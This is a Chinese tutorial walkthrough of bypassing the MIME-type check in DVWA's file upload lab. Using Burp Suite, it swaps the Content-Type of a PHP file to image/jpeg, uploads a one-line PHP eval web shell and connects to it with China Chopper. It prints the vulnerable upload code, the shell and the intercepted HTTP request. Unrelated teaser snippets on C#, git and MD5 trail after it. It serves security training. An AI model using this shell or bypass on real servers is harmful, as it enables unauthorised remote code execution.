(1).目标站的文件上传验证文件的MIME类型必须为image/jpeg,示例代码:
<?php if (isset($_POST['Upload'])) { $target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/"; $target_path = $target_path . basename($_FILES['uploaded']['name']); $uploaded_name = $_FILES['uploaded']['name']; $uploaded_type = $_FILES['uploaded']['type']; $uploaded_size = $_FILES['uploaded']['size']; if (($uploaded_type == "image/jpeg") && ($uploaded_size < 100000)) { if (!move_uploaded_file($_FILES['uploaded']['tmp_name'], $target_path)) { echo '<pre>'; echo 'Your image was not uploaded.'; echo '</pre>'; } else { echo '<pre>'; echo $target_path . ' succesfully uploaded!'; echo '</pre>'; } } else { echo '<pre>Your image was not uploaded.</pre>'; } }
(2).开启kali中的工具Burp Suite开启其中的代理拦截修改功能,开启的代理为192.168.147.132 8080
(3).本机电脑浏览器不设置代理在文件上传页选择木马文件muma.php
<?php @eval($_POST['pass']);?>
(4).本机电脑浏览器设置代理为上面Burp Suite的代理,记得Burp Suite要开启代理拦截,然后点击上传,此时打开Burp Suite软件看到拦截信息的raw内容如下:
POST /dvwa/vulnerabilities/upload/ HTTP/1.1 Host: 192.168.147.131 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------68278927234299128771152654658 Content-Length: 507 Origin: http://192.168.147.131 Connection: close Referer: http://192.168.147.131/dvwa/vulnerabilities/upload/ Cookie: security=low; security=medium; PHPSESSID=vl1eiur1jcp2kadhjun9tjogq7 Upgrade-Insecure-Requests: 1 -----------------------------68278927234299128771152654658 Content-Disposition: form-data; name="MAX_FILE_SIZE" 100000 -----------------------------68278927234299128771152654658 Content-Disposition: form-data; name="uploaded"; filename="muma.php" Content-Type: application/octet-stream <?php @eval($_POST['pass']);?> -----------------------------68278927234299128771152654658 Content-Disposition: form-data; name="Upload" Upload -----------------------------68278927234299128771152654658--
我们将raw中Content-Type: application/octet-stream改为Content-Type: image/jpeg,点击forward正式发送出去,此时浏览器显示上传成功.中国菜刀测试一键连接。
记得此处的Content-Type是和浏览器中直接看到的是不同的。这算是OWASP Broken Web Applications Project项目中典型的例子。
c#中string和StringBuilder直接看看执行速度。(2).String类型累计赋值Test  ...
1.远程仓库的协作模式开发者把自己最新的版本推到线上仓库,同时把线上仓库的最新代码,拉到自己本地即可2.注册git帐号国外: http://www.github.com国内: http://git.oschina.net2.在码云创建项目,不要初始化readmegit push https://gi...
git pull https://git.oschina.net/392223903/learn.git master 换为您的git地址...
日志查看:git log版本切换:方式1:git reset --hard HEAD^ 倒退一个版本git reset --hard HEAD^^ 倒退两个版本方式2:(版本号的形式,建议版本号码补充完...
1.关机Process.Start("shutdown", "-s -t 0"); 2. 注销 Proc...
public static string GetMD5(string str) { //创建MD5对象 MD5 md5 = MD5.C...